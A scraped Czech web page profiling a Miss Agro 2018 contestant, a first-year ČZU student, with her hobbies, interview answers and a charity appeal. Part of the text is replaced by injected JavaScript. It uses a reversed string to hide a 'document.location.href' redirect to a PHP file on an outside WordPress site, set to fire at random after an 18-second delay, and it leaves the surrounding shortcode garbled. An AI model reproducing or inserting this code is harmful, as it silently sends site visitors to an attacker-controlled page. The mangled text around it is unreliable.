Petra Tošovská

Profil

Fakulta: PEF
Obor: Veřejná správa a regionální rozvoj (VSRR)
Ročník: 1.
Věk:
21

Petra je člověk, který nepřemýšlí moc do budoucna a rozhoduje se z minuty na minutu. Mezi její koníčky patří dlouhodobě volejbal a nyní i bruslení na in-linech, na kterých neumí a spíše tím baví své okolí. Jejím zlozvykem je dělat věci na poslední chvíli, aby si pak řekla, že příště už to udělá dřív, ale to jí stejně nikdy nevyjde. V neposlední řadě je pro každou špatnost, je nadměrně ukecaná a má smysl pro stupidní humor.

“Podporujeme

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domovů“ css=“.vc_custom_1492523222849{margin-top: 30px !important;}“]Miss Agro podporuje mladé studenty z dětských domovů prostřednictvím Nadačního fondu Veroniky Kašákové. Podpořte je i Vy! Přispět můžete libovolnou částkou na účet 2113124252/2700. Více informací najdete na webových stránkách www.nfvk.cz. Děkujeme, že pomáháte!

Proč by ses zrovna Ty měla stát Miss Agro 2018?

S focením, chozením po molu a celkově s modelingem nemám žádné zkušenosti ani nejsem typem dokonalé dívky. Proto si myslím, že bych mohla být dobrým příkladem pro ostatní holky, že Miss Agro se může stát i ta, která se v tomto „světě“ necítí jako ryba ve vodě.

Kdyby ses mohla narodit ještě jednou, kým bys chtěla být?

Z neživých by to byla Alžběta I. a ze živých bych neměnila.

Proč sis vybrala zrovna studium na ČZU a co máš na ní nejraději?

Popravdě ČZU moje prioritní volba nebyla. Věřím ale, že se věci dějí z určitého důvodu a jsem ráda, že vše dopadlo jinak, než jsem původně plánovala. Kampus nabízí řadu možností, jak trávit čas a člověk přitom nemusí přejíždět po celé Praze, což je jedna z mnoha věcí, která je mi na univerzitě hodně sympatická. A co mám na ČZU nejraději ? Rozhodně lidi. Studium mi do života přineslo spoustu nových přátel a řada z nich nyní patří mezi mé nejbližší.

Přihlásila ses do Miss Agro sama nebo Tě přihlásil někdo jiný?

Přihlásil mě kamarád. Děkuju, Vítku!